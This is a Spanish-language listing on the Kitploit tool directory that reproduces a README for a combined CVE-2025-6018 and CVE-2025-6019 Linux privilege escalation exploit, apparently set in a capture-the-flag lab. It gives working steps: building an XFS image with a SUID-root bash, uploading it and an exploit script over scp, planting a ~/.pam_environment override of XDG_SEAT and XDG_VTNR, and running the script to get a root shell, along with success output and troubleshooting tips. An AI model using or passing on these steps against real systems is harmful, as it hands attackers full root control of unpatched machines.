Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — Exploit de escalada de privilegios CVE-2025-6018 + CVE-2025-6019 | Kitploit
Herramientas/GitHubGitHub/muyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingExplotación de Binarios
GitHubmuyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

Exploit de escalada de privilegios CVE-2025-6018 + CVE-2025-6019

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1212hace 7 mesesAún no revisado

Guía de Escalada de Privilegios CVE-2025-6018 + CVE-2025-6019

中文

📋 Pasos Rápidos de Explotación

Paso 1: Preparar la Imagen XFS (Máquina Local)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

Paso 2: Subir Archivos al Objetivo

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

Paso 3: Primer Inicio de Sesión - Configurar PAM

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

Paso 4: Segundo Inicio de Sesión - Ejecutar Escalada de Privilegios

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ Indicadores de Éxito

Si la explotación tiene éxito, deberías ver:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 Solución de Problemas

ProblemaSolución
devuelve

📌 Puntos Clave

  • ✅ Debes cerrar sesión y volver a iniciarla: La configuración de PAM solo surte efecto en nuevas sesiones
  • ✅ Verifica CanReboot: Confirma que devuelve ('yes',) antes de ejecutar el script
  • ✅ Usa inicio de sesión SSH: No uses la ejecución estilo ssh -t user@host "cmd"

🐱 Gato Guardián

Si falla, ¡asegúrate de que cada paso se ejecute estrictamente en orden!

Descargar herramienta
CanReboot
('no',)
Asegúrate de haber cerrado sesión y vuelto a iniciarla (Paso 3)
Error Not authorizedVerifica que el contenido de ~/.pam_environment sea correcto
No se encuentra SUID bashVuelve a subir xfs.image y verifica que el bit SUID esté activado